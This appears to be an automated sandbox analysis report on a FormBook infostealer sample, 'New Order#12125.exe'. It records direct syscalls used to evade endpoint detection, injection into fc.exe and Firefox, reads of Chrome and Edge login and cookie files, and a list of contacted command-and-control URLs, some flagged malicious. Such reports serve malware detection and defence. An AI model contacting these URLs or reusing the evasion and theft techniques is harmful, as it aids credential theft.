              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C8B28 mov eax, dword ptr fs:[00000030h]0_2_015C8B28
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C8B28 mov eax, dword ptr fs:[00000030h]0_2_015C8B28
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AEBD0 mov eax, dword ptr fs:[00000030h]0_2_015AEBD0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01520BCB mov eax, dword ptr fs:[00000030h]0_2_01520BCB
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01520BCB mov eax, dword ptr fs:[00000030h]0_2_01520BCB
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01520BCB mov eax, dword ptr fs:[00000030h]0_2_01520BCB
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01500BCD mov eax, dword ptr fs:[00000030h]0_2_01500BCD
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01500BCD mov eax, dword ptr fs:[00000030h]0_2_01500BCD
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01500BCD mov eax, dword ptr fs:[00000030h]0_2_01500BCD
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01508BF0 mov eax, dword ptr fs:[00000030h]0_2_01508BF0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01508BF0 mov eax, dword ptr fs:[00000030h]0_2_01508BF0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01508BF0 mov eax, dword ptr fs:[00000030h]0_2_01508BF0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158CBF0 mov eax, dword ptr fs:[00000030h]0_2_0158CBF0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152EBFC mov eax, dword ptr fs:[00000030h]0_2_0152EBFC
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B4BB0 mov eax, dword ptr fs:[00000030h]0_2_015B4BB0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B4BB0 mov eax, dword ptr fs:[00000030h]0_2_015B4BB0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510BBE mov eax, dword ptr fs:[00000030h]0_2_01510BBE
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510BBE mov eax, dword ptr fs:[00000030h]0_2_01510BBE
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01506A50 mov eax, dword ptr fs:[00000030h]0_2_01506A50
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01506A50 mov eax, dword ptr fs:[00000030h]0_2_01506A50
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01506A50 mov eax, dword ptr fs:[00000030h]0_2_01506A50
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01506A50 mov eax, dword ptr fs:[00000030h]0_2_01506A50
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01506A50 mov eax, dword ptr fs:[00000030h]0_2_01506A50
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01506A50 mov eax, dword ptr fs:[00000030h]0_2_01506A50
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01506A50 mov eax, dword ptr fs:[00000030h]0_2_01506A50
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510A5B mov eax, dword ptr fs:[00000030h]0_2_01510A5B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510A5B mov eax, dword ptr fs:[00000030h]0_2_01510A5B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157CA72 mov eax, dword ptr fs:[00000030h]0_2_0157CA72
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157CA72 mov eax, dword ptr fs:[00000030h]0_2_0157CA72
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AEA60 mov eax, dword ptr fs:[00000030h]0_2_015AEA60
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153CA6F mov eax, dword ptr fs:[00000030h]0_2_0153CA6F
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153CA6F mov eax, dword ptr fs:[00000030h]0_2_0153CA6F
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153CA6F mov eax, dword ptr fs:[00000030h]0_2_0153CA6F
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158CA11 mov eax, dword ptr fs:[00000030h]0_2_0158CA11
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01524A35 mov eax, dword ptr fs:[00000030h]0_2_01524A35
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01524A35 mov eax, dword ptr fs:[00000030h]0_2_01524A35
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153CA38 mov eax, dword ptr fs:[00000030h]0_2_0153CA38
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153CA24 mov eax, dword ptr fs:[00000030h]0_2_0153CA24
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152EA2E mov eax, dword ptr fs:[00000030h]0_2_0152EA2E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01500AD0 mov eax, dword ptr fs:[00000030h]0_2_01500AD0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01534AD0 mov eax, dword ptr fs:[00000030h]0_2_01534AD0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01534AD0 mov eax, dword ptr fs:[00000030h]0_2_01534AD0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01556ACC mov eax, dword ptr fs:[00000030h]0_2_01556ACC
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01556ACC mov eax, dword ptr fs:[00000030h]0_2_01556ACC
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01556ACC mov eax, dword ptr fs:[00000030h]0_2_01556ACC
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153AAEE mov eax, dword ptr fs:[00000030h]0_2_0153AAEE
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153AAEE mov eax, dword ptr fs:[00000030h]0_2_0153AAEE
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01538A90 mov edx, dword ptr fs:[00000030h]0_2_01538A90
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150EA80 mov eax, dword ptr fs:[00000030h]0_2_0150EA80
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150EA80 mov eax, dword ptr fs:[00000030h]0_2_0150EA80

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtClose: Direct from: 0x77462B6C
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\New Order#12125.exeSection loaded: NULL target: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\New Order#12125.exeSection loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\fc.exeThread register set: target process: 8060Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\fc.exeThread APC queued: target process: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeJump to behavior
              Source: C:\Program Files (x86)\oYLKpwqBkzCleuTzeQzEvDIJYqkufSLzHgvbZcFtpMdmQHlfXIvTMMjSMbJ\XcmmvCqVSCAb.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: XcmmvCqVSCAb.exe, 00000003.00000000.1721854340.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000003.00000002.3858213362.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000000.1872011643.0000000001000000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: XcmmvCqVSCAb.exe, 00000003.00000000.1721854340.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000003.00000002.3858213362.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000000.1872011643.0000000001000000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: XcmmvCqVSCAb.exe, 00000003.00000000.1721854340.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000003.00000002.3858213362.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000000.1872011643.0000000001000000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
              Source: XcmmvCqVSCAb.exe, 00000003.00000000.1721854340.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000003.00000002.3858213362.0000000001A31000.00000002.00000001.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000000.1872011643.0000000001000000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.New Order#12125.exe.290000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1802187865.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3862175429.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3862316494.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3849108726.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3862461350.0000000003C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1805331540.00000000022F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.New Order#12125.exe.290000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1802187865.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3862175429.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3862316494.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3849108726.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3862461350.0000000003C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1805331540.00000000022F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              DLL Side-Loading              		312
              Process Injection              		2
              Virtualization/Sandbox Evasion              		1
              OS Credential Dumping              		121
              Security Software Discovery              		Remote Services1
              Email Collection              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Abuse Elevation Control Mechanism              		312
              Process Injection              		LSASS Memory2
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin Shares1
              Data from Local System              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Abuse Elevation Control Mechanism              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture4
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
              Obfuscated Files or Information              		LSA Secrets2
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing              		Cached Domain Credentials12
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              New Order#12125.exe66%VirustotalBrowse
              New Order#12125.exe71%ReversingLabsWin32.Backdoor.FormBook
              New Order#12125.exe100%AviraTR/Crypt.ZPACK.Gen
              New Order#12125.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.gayhxi.info/k2i2/?60q4=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYF/WObEBiJBWRMbpDnW8pt5wghpp2/wZ5fkXlTj7vN//Tw==&XxGx=INH0eLoh100%Avira URL Cloudmalware
              http://www.sonixingenuine.shop/01c7/?XxGx=INH0eLoh&60q4=YTigy0/11EA1EDERDWqOfMNZXkK2gBVueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReFoBqhl5n3/gZ7z43FPL8v6UGlzjHBkbB1lRKGmkyDfNsg==0%Avira URL Cloudsafe
              http://www.investshares.net/cf9p/?60q4=tknvN2jlhTuvpXXfB7aTVyatH+optGyLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFK8besZipepVANv+t7hBu9DYDfOtNcbRzWTW+UxqRkwAygg==&XxGx=INH0eLoh0%Avira URL Cloudsafe
              http://cifasnc.info/8rr3/?60q4=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg0%Avira URL Cloudsafe
              http://www.44756.pizza/a59t/0%Avira URL Cloudsafe
              http://www.lonfor.website/bowc/?XxGx=INH0eLoh&60q4=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO+9x4X9y8Z/5Ky7IaWcKrL+RZ/80JfAgkwuEz7OkyFGBk9g==0%Avira URL Cloudsafe
              http://www.44756.pizza/a59t/?60q4=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acut6Rdyu+TCEGVVLJHlB4H68wm+9nMwlD43slzfYSOf5Syg==&XxGx=INH0eLoh0%Avira URL Cloudsafe
              http://www.moyu19.pro0%Avira URL Cloudsafe
              http://www.adadev.info/ctdy/100%Avira URL Cloudmalware
              http://www.grimbo.boats/kxtt/0%Avira URL Cloudsafe
              http://www.denture-prices.click/dx3i/?60q4=d8Ky6hmePKhU2XxCZcorJpWfFstOvl7w2U4uZFU2PglJR/EsTh4FCVpvl1B6U0BHfI68a/67nkOplmDPjd8pdGjvy0c7sWjSWanGPqhflfgeWepWZ17tVEIX5zsWYbAgUQ==&XxGx=INH0eLoh0%Avira URL Cloudsafe
              https://www.sonixingenuine.shop/01c7/?XxGx=INH0eLoh&60q4=YTigy0/11EA1EDERDWqOfMNZXkK2gBVueN49sLqr1to0%Avira URL Cloudsafe
              http://www.nosolofichas.online/hqr6/0%Avira URL Cloudsafe
              http://www.adadev.info/ctdy/?XxGx=INH0eLoh&60q4=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZFRMH0zJP+kybsKdAAfaCKHAM6Zo7ldb4F8fWSMfSKwbdMw==100%Avira URL Cloudmalware
              http://www.investshares.net/cf9p/0%Avira URL Cloudsafe
              http://www.moyu19.pro/b9e2/0%Avira URL Cloudsafe
              http://www.promocao.info/zaz4/0%Avira URL Cloudsafe
              http://www.nosolofichas.online/hqr6/?60q4=zX0jw1Jb7ql8GILmYUO6wMs9InQYjg93TcA9XJSzUhKPf0bKw3wcZTcOExSEJIWiFeUL4na64vamMH1j0X3tfeyls16INcIZma1Jpk987Wy75kHMsLzMhDfgt4WvdaOefQ==&XxGx=INH0eLoh0%Avira URL Cloudsafe
              http://www.sonixingenuine.shop/01c7/0%Avira URL Cloudsafe
              http://www.lonfor.website/bowc/0%Avira URL Cloudsafe
              http://www.cifasnc.info/8rr3/0%Avira URL Cloudsafe
              http://www.denture-prices.click/dx3i/0%Avira URL Cloudsafe
              http://www.cifasnc.info/8rr3/?60q4=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6lv1Dk2KgOeGcWS57RgWwvqcZEoOC4yFjEhnf2QufT28mA==&XxGx=INH0eLoh0%Avira URL Cloudsafe
